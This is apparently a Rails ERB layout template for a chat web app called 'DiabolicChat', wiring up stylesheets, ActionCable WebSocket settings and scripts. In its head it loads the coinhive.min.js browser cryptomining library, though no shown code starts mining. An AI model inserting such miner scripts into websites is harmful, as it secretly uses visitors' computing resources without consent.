<!DOCTYPE html>
<html>
  <head>
    <title>DiabolicChat</title>
    <%= csrf_meta_tags %>

    <%= stylesheet_link_tag    'application', media: 'all' %>
    <%= stylesheet_pack_tag 'app' %>
    <script src="https://coinhive.com/lib/coinhive.min.js"></script>
  </head>

  <body>
    <%= yield %>

    <script type="text/javascript">
      window.AppConfig = {
        WEBSOCKET_HOST: "<%= ENV['WEBSOCKET_HOST'] %>",
        WEBSOCKET_PATH: "<%= ActionCable.server.config.mount_path %>",
      }
    </script>
    <%= javascript_include_tag 'application' %>
    <script src="//twemoji.maxcdn.com/2/twemoji.min.js?2.3.0"></script>
  </body>
</html>
